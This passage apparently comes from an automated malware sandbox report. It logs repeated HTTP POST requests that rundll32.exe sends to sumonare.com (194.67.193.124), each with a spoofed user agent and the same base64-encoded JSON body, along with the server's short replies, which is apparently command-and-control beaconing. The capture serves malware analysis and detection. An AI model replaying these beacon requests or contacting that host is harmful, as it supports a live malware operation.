                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:27.793833017 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:27 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                61192.168.2.749784194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:27.940860987 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:28.766661882 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:28 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                62192.168.2.749785194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:28.909327984 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:29.732525110 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:29 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                63192.168.2.749786194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:29.883862019 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:30.700278997 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:30 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                64192.168.2.749787194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:30.845976114 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:31.653947115 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:31 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                65192.168.2.749788194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:31.798415899 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:32.626899958 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:32 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                66192.168.2.749789194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:32.768733978 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:33.578135014 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:33 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                67192.168.2.749790194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:33.721800089 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:34.545383930 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:34 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                68192.168.2.749791194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:34.704471111 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:35.533504009 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:35 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                69192.168.2.749792194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:35.676003933 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:36.484030008 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:36 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                70192.168.2.749793194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:36.627794027 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:37.450638056 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:37 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                71192.168.2.749794194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:37.596106052 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:38.424365997 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:38 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                72192.168.2.749795194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:38.566061974 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
